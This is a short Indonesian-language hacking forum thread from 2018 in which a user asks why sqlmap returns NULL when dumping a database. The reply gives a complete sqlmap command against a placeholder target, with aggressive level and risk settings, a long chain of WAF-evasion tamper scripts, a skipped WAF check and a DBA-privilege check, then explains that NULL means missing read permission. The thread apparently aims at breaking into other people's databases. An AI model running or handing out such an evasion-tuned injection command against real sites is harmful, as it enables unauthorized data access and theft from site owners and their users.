[Ask] NULL database
(04-07-2018, 07:48 AM)arief31 Wrote: Selamat pagi.
saya mau tanya, cara membuka database yang NULL pada sqlmap gimana caranya?

maaf pengguna baru Smile

uda pake option begini:
sqlmap -u http://target --dbs --random-agent --level=5 --risk=3 --timeout=10 --time-sec=10 --no-cast --threads=10 --skip-waf --dbms=mysql --os=linux --keep-alive --retries=2 --technique=BEUST --eta --is-dba --flush-session --batch --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

kalo option begitu masi NULL, berarti memang ga dpt permission untuk baca isi column itu, atau ga ada permission untuk akses table dlm db itu

Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do

Messages In This Thread
NULL database - by arief31 - 04-07-2018, 07:48 AM
RE: NULL database - by cyberking - 04-13-2018, 05:40 PM

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